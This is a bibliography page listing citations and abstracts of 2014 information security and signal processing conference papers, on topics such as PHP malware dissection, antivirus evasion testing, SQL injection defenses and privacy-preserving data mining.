Wrench, Peter M.; Irwin, Barry V.W., "Towards a Sandbox For The Deobfuscation And Dissection of PHP Malware," Information Security for South Africa (ISSA), 2014, pp. 1, 8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950504 The creation and proliferation of PHP-based Remote Access Trojans (or web shells) used in both the compromise and post exploitation of web platforms has fuelled research into automated methods of dissecting and analysing these shells. Current malware tools disguise themselves by making use of obfuscation techniques designed to frustrate any efforts to dissect or reverse engineer the code. Advanced code engineering can even cause malware to behave differently if it detects that it is not running on the system for which it was originally targeted. To combat these defensive techniques, this paper presents a sandbox-based environment that aims to accurately mimic a vulnerable host and is capable of semi-automatic semantic dissection and syntactic deobfuscation of PHP code.

Keywords: Arrays; Databases; Decoding; Malware; Process control; Semantics; Software; Code deobfuscation; Reverse engineering; Sandboxing (ID#: 14-3409)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950504&isnumber=6950479

 

Ophoff, Jacques; Robinson, Mark, "Exploring End-User Smartphone Security Awareness Within A South African Context," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014

doi: 10.1109/ISSA.2014.6950500 International research has shown that users are complacent when it comes to smartphone security behaviour. This is contradictory, as users perceive data stored on the ‘smart’ devices to be private and worth protecting. Traditionally less attention is paid to human factors compared to technical security controls (such as firewalls and antivirus), but there is a crucial need to analyse human aspects as technology alone cannot deliver complete security solutions. Increasing a user's knowledge can improve compliance with good security practices, but for trainers and educators to create meaningful security awareness materials they must have a thorough understanding of users' existing behaviours, misconceptions and general attitude towards smartphone security.

Keywords: Androids; Context; Humanoid robots; Portable computers; Security; Awareness and Training in Security; Mobile Computing Security; Smartphone (ID#: 14-3410)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950500&isnumber=6950479

 

Hauger, Werner K.; Olivier, Martin S., "The Role Of Triggers In Database Forensics," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950506 An aspect of database forensics that has not received much attention in the academic research community yet is the presence of database triggers. Database triggers and their implementations have not yet been thoroughly analysed to establish what possible impact they could have on digital forensic analysis methods and processes. Conventional database triggers are defined to perform automatic actions based on changes in the database. These changes can be on the data level or the data definition level. Digital forensic investigators might thus feel that database triggers do not have an impact on their work. They are simply interrogating the data and metadata without making any changes. This paper attempts to establish if the presence of triggers in a database could potentially disrupt, manipulate or even thwart forensic investigations. The database triggers as defined in the SQL standard were studied together with a number of database trigger implementations. This was done in order to establish what aspects might have an impact on digital forensic analysis. It is demonstrated in this paper that some of the current database forensic analysis methods are impacted by the possible presence of certain types of triggers in a database. Furthermore, it finds that the forensic interpretation and attribution processes should be extended to include the handling and analysis of database triggers if they are present in a database.

Keywords: Databases; Dictionaries; Forensics; Irrigation; Monitoring; Reliability; database forensics; database triggers; digital forensic analysis; methods; processes (ID#: 14-3411)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950506&isnumber=6950479

 

Savola, Reijo M.; Kylanpaa, Markku, "Security Objectives, Controls And Metrics Development For An Android Smartphone Application," Information Security for South Africa (ISSA), 2014, pp.1, 8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950501 Security in Android smartphone platforms deployed in public safety and security mobile networks is a remarkable challenge. We analyse the security objectives and controls for these systems based on an industrial risk analysis. The target system of the investigation is an Android platform utilized for public safety and security mobile network. We analyse how a security decision making regarding this target system can be supported by effective and efficient security metrics. In addition, we describe implementation details of security controls for authorization and integrity objectives of a demonstration of the target system.

Keywords: Authorization; Libraries; Monitoring; Android; risk analysis; security effectiveness; security metrics; security objectives (ID#: 14-3412)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950501&isnumber=6950479

 

Haffejee, Jameel; Irwin, Barry, "Testing Antivirus Engines To Determine Their Effectiveness As A Security Layer," Information Security for South Africa (ISSA), 2014, pp.1, 6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950496 This research has been undertaken to empirically test the assumption that it is trivial to bypass an antivirus application and to gauge the effectiveness of antivirus engines when faced with a number of known evasion techniques. A known malicious binary was combined with evasion techniques and deployed against several antivirus engines to test their detection ability. The research also documents the process of setting up an environment for testing antivirus engines as well as building the evasion techniques used in the tests. This environment facilitated the empirical testing that was needed to determine if the assumption that antivirus security controls could easily be bypassed. The results of the empirical tests are also presented in this research and demonstrate that it is indeed within reason that an attacker can evade multiple antivirus engines without much effort. As such while an antivirus application is useful for protecting against known threats, it does not work as effectively against unknown threats.

Keywords: Companies; Cryptography; Engines; Malware; Payloads; Testing; Antivirus; Defense; Malware (ID#: 14-3413)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950496&isnumber=6950479

 

van Staden, Wynand JC, "An Investigation Into Reducing Third Party Privacy Breaches During The Investigation Of Cybercrime," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950503 In this article we continue previous work in which a framework for preventing or limiting a privacy breach of a third party during the investigation of cybercrime. The investigations may be conducted internally (by the enterprise), or externally (by a third party, or a law enforcement agency) depending on the jurisdiction and context of the case. In many cases, an enterprise will conduct an internal investigation against some allegation of wrongdoing by an employee, or a client. In these cases maintaining the privacy promise made to other clients or customers is an ideal that the enterprise may wish to honour, especially if the image or brand of the enterprise may be impacted when the details of the process followed during the investigation becomes clear. The article reports on the results of the implementation of the privacy breach detection - it also includes lessons learned, and proposes further steps for refining the breach detection techniques and methods for future digital forensic investigation.

Keywords: Business; Context; Digital forensics; Electronic mail; Indexes; Postal services; Privacy; Cybercrime; Digital Forensics; Privacy; Privacy Breach; Third Party Privacy (ID#: 14-3414)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950503&isnumber=6950479

 

Mirza, Abdul; Senekane, Makhamisa; Petruccione, Francesco; van Niekerk, Brett, "Suitability of Quantum Cryptography For National Facilities," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950513 Quantum cryptography, or more accurately Quantum Key Distribution (QKD), provides a secure mechanism to exchange encryption keys which can detect potential eavesdroppers. However, this is a relatively new technology in terms of implementation, and there are some concerns over possible attacks. This paper describes QKD and provides an overview of the implementations in South Africa. From this, a basic vulnerability assessment is performed to determine the suitability of QKD for use in critical national facilities. While there are vulnerabilities, some of these can be easily mitigated through proper design and planning. The implementation of QKD as an additional layer to the encryption process may serve to improve the security between national key points.

Keywords: Cryptography; Educational institutions; Quantum mechanics; TV; critical infrastructure protection; quantum cryptography; quantum key distribution; vulnerability assessment (ID#: 14-3415)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950513&isnumber=6950479

 

du Plessis, Warren P., "Software-Defined Radio (SDR) As A Mechanism For Exploring Cyber-Electronic Warfare (EW) Collaboration," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950516 Cyber is concerned with networks of systems in all their possible forms. Electronic warfare (EW) is focused on the many different uses of the electromagnetic spectrum (EMS). Given that many networks make use of the EMS (wireless networks), there is clearly large scope for collaboration between the cyber-warfare and EW communities. Unfortunately, such collaboration is complicated by the significant differences between these two realms. Software-defined radio (SDR) systems are based on interfaces between the EMS and computers and thus offer tremendous potential for encouraging cyber-EW collaboration. The concept of SDR is reviewed along with some hardware and software SDR systems. These are then used to propose a number of projects where SDR systems allow collaboration between the cyber and EW realms to achieve effects which neither realm could achieve alone.

Keywords: Bandwidth; Collaboration; Computers; Hardware; Protocols; Software; Standards; Electronic warfare (EW); cyber; electromagnetic spectrum (EMS); software-defined radio (SDR) (ID#: 14-3416)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950516&isnumber=6950479

 

Tekeni, Luzuko; Thomson, Kerry-Lynn; Botha, Reinhardt A., "Concerns Regarding Service Authorization By IP Address Using Eduroam," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950495 Eduroam is a secure WLAN roaming service between academic and research institutions around the globe. It allows users from participating institutions secure Internet access at any other participating visited institution using their home credentials. The authentication credentials are verified by the home institution, while authorization is done by the visited institution. The user receives an IP address in the range of the visited institution, and accesses the Internet through the firewall and proxy servers of the visited institution. However, access granted to services that authorize via an IP address of the visited institution may include access to services that are not allowed at the home institution, due to legal agreements. This paper looks at typical legal agreements with service providers and explores the risks and countermeasures that need to be considered when using eduroam.

Keywords: IEEE Xplore; Servers; Authorization; IP-Based; Service Level Agreement; eduroam (ID#: 14-3417)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950495&isnumber=6950479

 

Mouton, Francois; Malan, Mercia M.; Leenen, Louise; Venter, H.S., "Social Engineering Attack Framework," Information Security for South Africa (ISSA), 2014, pp.1,9, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950510 The field of information security is a fast growing discipline. Even though the effectiveness of security measures to protect sensitive information is increasing, people remain susceptible to manipulation and the human element is thus a weak link. A social engineering attack targets this weakness by using various manipulation techniques in order to elicit sensitive information. The field of social engineering is still in its infancy stages with regards to formal definitions and attack frameworks. This paper proposes a social engineering attack framework based on Kevin Mitnick's social engineering attack cycle. The attack framework addresses shortcomings of Mitnick's social engineering attack cycle and focuses on every step of the social engineering attack from determining the goal of an attack up to the successful conclusion of the attack. The authors use a previously proposed social engineering attack ontological model which provides a formal definition for a social engineering attack. The ontological model contains all the components of a social engineering attack and the social engineering attack framework presented in this paper is able to represent temporal data such as flow and time. Furthermore, this paper demonstrates how historical social engineering attacks can be mapped to the social engineering attack framework. By combining the ontological model and the attack framework, one is able to generate social engineering attack scenarios and to map historical social engineering attacks to a standardised format. Scenario generation and analysis of previous attacks are useful for the development of awareness, training purposes and the development of countermeasures against social engineering attacks.

Keywords: Ash; Buildings; Data models; Electronic mail; Information security; Vectors; Bidirectional Communication; Indirect Communication; Mitnick's Attack Cycle; Ontological Model; Social Engineering; Social Engineering Attack; Social Engineering Attack Framework; Unidirectional Communication (ID#: 14-3418)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950510&isnumber=6950479


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Signal Propagation and Computer Technology (ICSPCT) - India

Signal Propagation and Computer Technology (2014), India


The 2014 International Conference on Signal Propagation and Computer Technology (ICSPCT) was held 12-13 July 2014 at Ajmer, India.  The technical program of IEEE ICSPCT 2014 consists of 21 Session’s: 13 Signal Propagation, 9 Computer Technology, and 2 Engineering Professionals. The organizers received more than 650 paper submissions from 10 countries, of which 155 papers were accepted.  The Science of Security-related papers are cited here.

 

Prakash, G.L.; Prateek, M.; Singh, I., "Data Encryption And Decryption Algorithms Using Key Rotations For Data Security In Cloud System," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on , vol., no., pp.624,629, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884895 Outsourcing the data in cloud computing is exponentially generating to scale up the hardware and software resources. How to protect the outsourced sensitive data as a service is becomes a major data security challenge in cloud computing. To address these data security challenges, we propose an efficient data encryption to encrypt sensitive data before sending to the cloud server. This exploits the block level data encryption using 256 bit symmetric key with rotation. In addition, data users can reconstruct the requested data from cloud server using shared secret key. We analyze the privacy protection of outsourced data using experiment is carried out on the repository of text files with variable size. The security and performance analysis shows that the proposed method is highly efficient than existing methods performance.

Keywords: {cloud computing; cryptography; data protection; outsourcing; block level data encryption; cloud computing; cloud server; data decryption algorithms; data outsourcing; data security; hardware resources; key rotations; performance analysis; privacy protection; shared secret key; software resources; text files; variable size; Algorithm design and analysis; Computational modeling; Encoding; Encryption; Servers; Software; Data Block; Decryption; Encryption; Key Rotation; Outsource; Security (ID#: 14-3366)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884895&isnumber=6884878

 

Duhan, N.; Saneja, B., "A Two Tier Defense Against SQL Injection," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.415,420, 12-13 July 2014

doi: 10.1109/ICSPCT.2014.6884906 In recent years with increase in ubiquity and popularity of web based applications, information systems are frequently migrated to the web, which will jeopardize security and privacy of the users. One of the most easiest and hazardous security attacks confronted by these systems is SQL injection attacks (SQLIAs). SQL injection attack is a method that can insert any malevolent query into the original query statement. In this paper, we demonstrate an efficient approach for Securing Web Application from SQL injection, which incorporates the combination of client side validation and identity based cryptography. To affirm the technique we examine it on some prototype web applications generated by web developer tools which ensure that our approach is secure and efficient and also hypothesis testing is done to validate the results.

Keywords: Internet; SQL; client-server systems; cryptography; data privacy; SQL injection attacks; Web based applications; Web developer tools; client side validation; hazardous security attacks; identity based cryptography; information systems; malevolent query; original query statement; two-tier defense; user privacy; user security; Cryptography; Educational institutions; IP networks ;Information filters; Libraries; Injection attack; SQL Injection; SQL Query; SQLIAs; Web application (ID#: 14-3367)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884906&isnumber=6884878

 

Chatterjee, S.; Gupta, A.K.; Mahor, V.K.; Sarmah, T., "An Efficient Fine Grained Access Control Scheme Based On Attributes For Enterprise Class Applications," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.273,278, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884907 Fine-grained access control is used to assign unique access privilege to a particular user for accessing any particular enterprise class application for which he/she is authorized. The existing mechanisms for restricting access of users to resources are mostly static and not fine grained. Those are not well-suited for the enterprise class applications where information access is dynamic and ad-hoc in nature. As a result, we need to design an effective fine grained access as well as authorization control scheme to control access to objects by evaluating rules against the set of attributes given both for the users and application objects. In this paper, we propose a new fine grained access and authorization control scheme based on attributes which is suitable for large enterprise class applications. The strengths of our proposed scheme based on attributes are that it provides fine grained access control with its authorization architecture and policy formulation based on attribute based access tree. In comparison with the role based access control (RBAC) approach, in this scenario there is no need to explicitly define any roles. Here, based on user access tree any user can get access to any particular application with full granularity.

Keywords: authorisation; business data processing; RBAC; attribute based access tree; authorization architecture; authorization control scheme; efficient fine grained access control scheme; enterprise class applications; policy formulation; role based access control; unique access privilege; user access tree; Cryptography; Logic gates; Safety (ID#: 14-3368)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884907&isnumber=6884878

 

Sanadhya, S.; Agrawal, N.; Singh, S., "Pheromone Base Swarm Approach For Detecting Articulation User Node In Social Networking," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.461,465, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884910 Modern world is living in the `aeon' of virtual community, where people connect to each other through any kind of relationship. Social networking is platform where people share emotions, activities, area of interest etc. Communities in social network are deployed in user nodes with connecting people, it may seem that there is some user which is common among many communities. These user node is a kind of `social articulation points (SAP)' which is like a bridge between communities. In this paper with the help of `ant colony optimization' (ACO) we are proposing `pheromone based swarm approach for articulation user' (PSAP) to find articulation user point in a social network. ACO is meta-heuristic which helps to solve combinational problems such as TSP, Graph color, job shop Network routing, machine learning etc. Hence social networking may be a new platform with ant colony optimization, to solve complex task in social phenomena.

Keywords: {ant colony optimisation; combinatorial mathematics; social sciences; ACO; PSAP; SAP; TSP; ant colony optimization; articulation user node detection; combinational problems ;graph color; job shop network routing; machine learning; meta-heuristic; pheromone base swarm approach; social articulation points; social networking; social phenomena; user nodes; virtual community; Cities and towns; Context; Instruments; Signal processing algorithms; ACO; SAP; Swarm-Intelligence; user rank matrices (ID#: 14-3369)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884910&isnumber=6884878

 

Singh, B.; Singh, D.; Singh, G.; Sharma, N.; Sibbal, V., "Motion Detection For Video Surveillance," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.578,584, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884919 Motion detection is one of the key techniques for automatic video analysis to extract crucial information from scenes in video surveillance systems. This paper presents a new algorithm for MOtion DEtection (MODE) which is independent of illumination variations, bootstrapping, dynamic variations and noise problems. MODE is pixel based non-parametric method which requires only one frame to construct the model. The foreground/background detection starts from second frame onwards. It employs new object tracking method which detects and remove ghost objects rapidly while preserving abandon objects from decomposing into background. The algorithm is tested on public available video datasets consisting of challenging scenarios by using only one set of parameters and proved to outperform other state-of-art motion detection techniques.

Keywords: feature extraction; motion estimation; object tracking; video surveillance; MODE; automatic video analysis; bootstrapping; dynamic variations; foreground-background detection; illumination variations; information extraction; motion detection; noise problems; object tracking method; state-of-art motion detection techniques; video datasets; video surveillance systems; Computational modeling; Training; Uncertainty; Background Subtraction; Background modelling; Motion Detection; Video Surveillance (ID#: 14-3370)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884919&isnumber=6884878

 

Mewara, B.; Bairwa, S.; Gajrani, J., "Browser's Defenses Against Reflected Cross-Site Scripting Attacks," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on , vol., no., pp.662,667, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884928 Due to the frequent usage of online web applications for various day-to-day activities, web applications are becoming most suitable target for attackers. Cross-Site Scripting also known as XSS attack, one of the most prominent defacing web based attack which can lead to compromise of whole browser rather than just the actual web application, from which attack has originated. Securing web applications using server side solutions is not profitable as developers are not necessarily security aware. Therefore, browser vendors have tried to evolve client side filters to defend against these attacks. This paper shows that even the foremost prevailing XSS filters deployed by latest versions of most widely used web browsers do not provide appropriate defense. We evaluate three browsers - Internet Explorer 11, Google Chrome 32, and Mozilla Firefox 27 for reflected XSS attack against different type of vulnerabilities. We find that none of above is completely able to defend against all possible type of reflected XSS vulnerabilities. Further, we evaluate Firefox after installing an add-on named XSS-Me, which is widely used for testing the reflected XSS vulnerabilities. Experimental results show that this client side solution can shield against greater percentage of vulnerabilities than other browsers. It is witnessed to be more propitious if this add-on is integrated inside the browser instead being enforced as an extension.

Keywords: online front-ends; security of data; Google Chrome 32;Internet Explorer 11; Mozilla Firefox 27;Web based attack; Web browsers; XSS attack; XSS filters; XSS-Me; online Web applications; reflected cross-site scripting attacks; Browsers; Security; Thyristors; JavaScript; Reflected XSS;XSS-Me; attacker; bypass; exploit; filter (ID#: 14-3371)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884928&isnumber=6884878

 

Sinha, R.; Uppal, D.; Singh, D.; Rathi, R., "Clickjacking: Existing Defenses And Some Novel Approaches," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.396,401, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884934 With the growth of information technology, World Wide Web is experiencing a rapid increase in online social networks' users. A serious threat to the integrity of these users' data which has come into picture these days is Clickjacking. Many server side and client side defense mechanisms are available for clickjacking but many attackers are still exploiting popular online social networks like Facebook and Twitter so that a user clicks on a spam link and it leads to unwanted posts flooding on his Facebook wall, from which arises the need of a powerful methodology at tester, host and user levels to assuage clickjacking. This paper aims at discussing various tools, techniques and methods available to detect, prevent or reduce clickjacking attacks along with the extent of usefulness and shortcoming of each approach. Later, we have summarized the results and provided an analysis of what needs to be done in the field of web security to encounter and remove clickjacking from the host as well as the developer side. Lastly, we have tested and suggested on how clickjacking defenses can be improved at server side and during development.

Keywords: security of data; social networking (online);Facebook; Twitter; Web security; World Wide Web; clickjacking; information technology; online social networks; spam link; user data integrity; Browsers; Clickjacking; aspect oriented programming; framebusting; iframe; likejacking; user interface randomization; user interface redressing (ID#: 14-3372)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884934&isnumber=6884878

 

Vamsi, P.R.; Kant, K., "Sybil Attack Detection Using Sequential Hypothesis Testing in Wireless Sensor Networks," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.698,702, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884945 Sybil attack poses a serious threat to geographic routing. In this attack, a malicious node attempts to broadcast incorrect location information, identity and secret key information. A Sybil node can tamper its neighboring nodes for the purpose of converting them as malicious. As the amount of Sybil nodes increase in the network, the network traffic will seriously affect and the data packets will never reach to their destinations. To address this problem, researchers have proposed several schemes to detect Sybil attacks. However, most of these schemes assume costly setup such as the use of relay nodes or use of expensive devices and expensive encryption methods to verify the location information. In this paper, the authors present a method to detect Sybil attacks using Sequential Hypothesis Testing. The proposed method has been examined using a Greedy Perimeter Stateless Routing (GPSR) protocol with analysis and simulation. The simulation results demonstrate that the proposed method is robust against detecting Sybil attacks.

Keywords: {network theory (graphs);routing protocols; statistical testing; telecommunication security; wireless sensor networks; GPSR protocol; Sybil attack detection; encryption methods; geographic routing ;greedy perimeter stateless routing; location information; malicious node; network traffic; sequential hypothesis testing; wireless sensor networks; Acoustics; Actuators; Bandwidth; IEEE 802.11 Standards; Optimization; Robustness; Wireless sensor networks; Sequential hypothesis testing; Sybil attack; geographic routing; wireless sensor networks (ID#: 14-3373)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884945&isnumber=6884878

 

Agarwal, A.K.; Srivastava, D.K., "Ancient Kaṭapayādi System Sanskrit Encryption Technique Unified," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.279,282, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884947 Computers today, generate enormous amount of data/information with each moment passing by. With the production of such huge amount of information comes its indispensable part of information security. Encryption Algorithms today drastically increase the file size. Hence the secure transmission of data requires extra bandwidth. Here in this paper we propose a system AKS - SETU, which is also the abbreviation to the title of this paper. Using the ancient technique of encryption from Sanskrit, AKS - SETU not only encrypts the information but also attempts on decreasing of the file size. AKS - SETU performs Sanskrit encryption, which we propose to be termed as Sanscryption.

Keywords: cryptography; natural language processing; AKS-SETU; Sanscryption; ancient Kaṭapaya̅di system Sanskrit encryption technique unified; encryption algorithms; file size; information security; secure data transmission; Barium; Cryptography; Electronic publishing; Encyclopedias; Internet; Encryption; Information security; Kaṭpayādi system; Sanscryption; Sanskrit (ID#: 14-3374)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884947&isnumber=6884878

 

Kulkarni, P.; Kulkarni, S.; Mulange, S.; Dand, A.; Cheeran, A.N., "Speech Recognition Using Wavelet Packets, Neural Networks and Support Vector Machines," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.451,455, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884949 This research article presents two different methods for extracting features for speech recognition. Based on the time-frequency, multi-resolution property of wavelet transform, the input speech signal is decomposed into various frequency channels. In the first method, the energies of the different levels obtained after applying wavelet packet decomposition instead of Discrete Fourier Transforms in the classical Mel-Frequency Cepstral Coefficients (MFCC) procedure, make the feature set. These feature sets are compared to the results from MFCC. And in the second method, a feature set is obtained by concatenating different levels, which carry significant information, obtained after wavelet packet decomposition of the signal. The feature extraction from the wavelet transform of the original signals adds more speech features from the approximation and detail components of these signals which assist in achieving higher identification rates. For feature matching Artificial Neural Networks (ANN) and Support Vector Machines (SVM) are used as classifiers. Experimental results show that the proposed methods improve the recognition rates.

Keywords: feature extraction; neural nets; speech recognition; support vector machines; time-frequency analysis; wavelet transforms; ANN;MFCC procedure; SVM; artificial neural networks; feature extraction; frequency channels; input speech signal decomposition; mel-frequency cepstral coefficients; multiresolution property; speech recognition; support vector machines; time-frequency property; wavelet packet decomposition; wavelet packets; wavelet transform; Artificial neural networks; Mel frequency cepstral coefficient; Speech recognition; Time-frequency analysis; Artificial Neural Networks; Feature Extraction; Support Vector Machines; Wavelet Packet Transform (ID#: 14-3375)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884949&isnumber=6884878

 

Gupta, M.K.; Govil, M.C.; Singh, G., "An Approach To Minimize False Positive In SQLI Vulnerabilities Detection Techniques Through Data Mining," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.407,410, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884962 Dependence on web applications is increasing very rapidly in recent time for social communications, health problem, financial transaction and many other purposes. Unfortunately, the presence of security weaknesses in web applications allows malicious user's to exploit various security vulnerabilities and become the reason of their failure. Currently, SQL Injection (SQLI) attacks exploit most dangerous security vulnerabilities in various popular web applications i.e. eBay, Google, Facebook, Twitter etc. Research on taint based vulnerability detection has been quite intensive in the past decade. However, these techniques are not free from false positive and false negative results. In this paper, we propose an approach to minimize false positive in SQLI vulnerability detection techniques using data mining concepts. We have implemented a prototype tool for PHP, MySQL technologies and evaluated it on six real world applications and NIST Benchmarks. Our evaluation and comparison results show that proposed technique detects SQLI vulnerabilities with low percentage of false positives.

Keywords: Internet; SQL; data mining; security of data; social networking (online);software reliability; Facebook; Google; MySQL technology; PHP; SQL injection attack; SQLI vulnerability detection techniques; Twitter; data mining; eBay; false positive minimization; financial transaction; health problem; social communications; taint based vulnerability detection; Computers; Software; SQLI attack; SQLI vulnerability; false positive; input validation; sanitization; taint analysis (ID#: 14-3376)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884962&isnumber=6884878

 

Singh, A.K.; Kumar, A.; Nandi, G.C.; Chakroborty, P., "Expression Invariant Fragmented Face Recognition," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp. 184, 189, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884987 Fragmented face recognition suggests a new way to recognize human faces with most discriminative facial components such as: Eyes, Nose and Mouth. An experimental study has been performed on 360 different subjects which confirms that more than 80% features of the full face lies within these fragmented components. The framework intends to process each component independently in order to find its corresponding match score. Final score is obtained by calculating weighted majority voting (WMV) of each component matched score. Three different feature extraction techniques like Eigenfaces, Fisher-faces and Scale Invariant Feature Transform (SIFT) are applied on full faces and fragmented face database (ORL Dataset). It has been observed from the classification accuracy that the strength of local features (SIFT) leads to achieve an encouraging recognition rate for fragmented components whereas the global features (Eigenfaces, Fisherfaces) increases misclassification error rate. This selection of optimal subset of face minimizes the comparison time and it also retains the correct classification rate irrespective of changing in facial expression. A standard Japanese Female facial expression dataset (JAFFE) has been used to investigate the major impact on Fragmented feature components. we have obtained a promising classification accuracy of 98.7% with this proposed technique.

Keywords: face recognition; feature extraction; image classification; transforms; visual databases; Fisher-faces; JAFFE; ORL dataset; SIFT; WMV; classification accuracy; discriminative facial components; eigenfaces; expression invariant fragmented face recognition; eyes; feature extraction techniques; fragmented face database; global features; local features; mouth; nose; scale invariant feature transform; standard Japanese female facial expression dataset; weighted majority voting; Databases; Mouth; Nose; Principal component analysis; EigenFaces; Face Recognition; Facial Landmark Localization; FisherFaces; Scale Invariant Feature Transformation; Weighted Majority Voting (ID#: 14-3377)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884987&isnumber=6884878

 

Pandey, A.; Srivastava, S., "An Approach For Virtual Machine Image Security," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.616,623, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884997 Cloud security being the main hindrance in adoption of cloud computing has some most vulnerable security concerns as: virtualization, data and storage. Here, to provide virtualization security, the components of virtualization (such as hypervisors, virtual machines, and virtual machine images) must be secured using some improvised security mechanisms. Amongst all components, Virtual machine images (VM images) are considered to be the fundamental of whole cloud security. Hence must be secured from every possible attack. In this paper, a security protocol is proposed to mainly protect the VM images from two of the possible attacks. One is the channel attack like man-in-the-middle attack (MITM attack) and second is the attack by a malicious executing environment. It is using a concept of symmetric key's component distribution providing an integrity based confidentiality and self-protection. This protection is based on an encapsulated mobile agent. Here one key component is generated and distributed in a secure manner and the other key component is derived by host platform itself using its own available resource configuration information. In order to verify the validity of this approach in overcoming different kind of security attacks, BAN logic based formal representation is presented.

Keywords: cloud computing; data protection; image processing; protocols; virtual machines; BAN logic based formal representation; MITM attack; VM images; channel attack; cloud computing; cloud security; encapsulated mobile agent; hypervisors; integrity based confidentiality; malicious executing environment; man-in-the-middle attack; resource configuration information; security attacks; security protocol; self-protection; symmetric key component distribution; virtual machine image security; virtualization security; Elasticity; Home appliances; Operating systems; Servers; Virtualization; BAN logic; cloud computing; mobile agent; self-protection approach; virtual machine image security (ID#: 14-3378)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884997&isnumber=6884878

 

Sharma, M.; Chaudhary, A.; Mathuria, M.; Chaudhary, S.; Kumar, S., "An Efficient Approach For Privacy Preserving In Data Mining," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.244,249, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6885001 In many organizations large amount of data are collected. These data are sometimes used by the organizations for data mining tasks. However, the data collected may contain private or sensitive information which should be protected. Privacy protection is an important issue if we release data for the mining or sharing purpose. Privacy preserving data mining techniques allow publishing data for the mining purpose while at the same time preserve the private information of the individuals. Many techniques have been proposed for privacy preservation but they suffer from various types of attacks and information loss. In this paper we proposed an efficient approach for privacy preservation in data mining. Our technique protects the sensitive data with less information loss which increase data usability and also prevent the sensitive data for various types of attack. Data can also be reconstructed using our proposed technique.

Keywords: data mining; data protection; data mining; data usability; information loss; privacy preservation; privacy protection; sensitive data protection; Cancer; Cryptography; Databases; Human immunodeficiency virus; Irrigation; Data mining; K- anonymity; Privacy preserving; Quasi-identifier; Randomization; Sensitive data (ID#: 14-3379)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6885001&isnumber=6884878

 

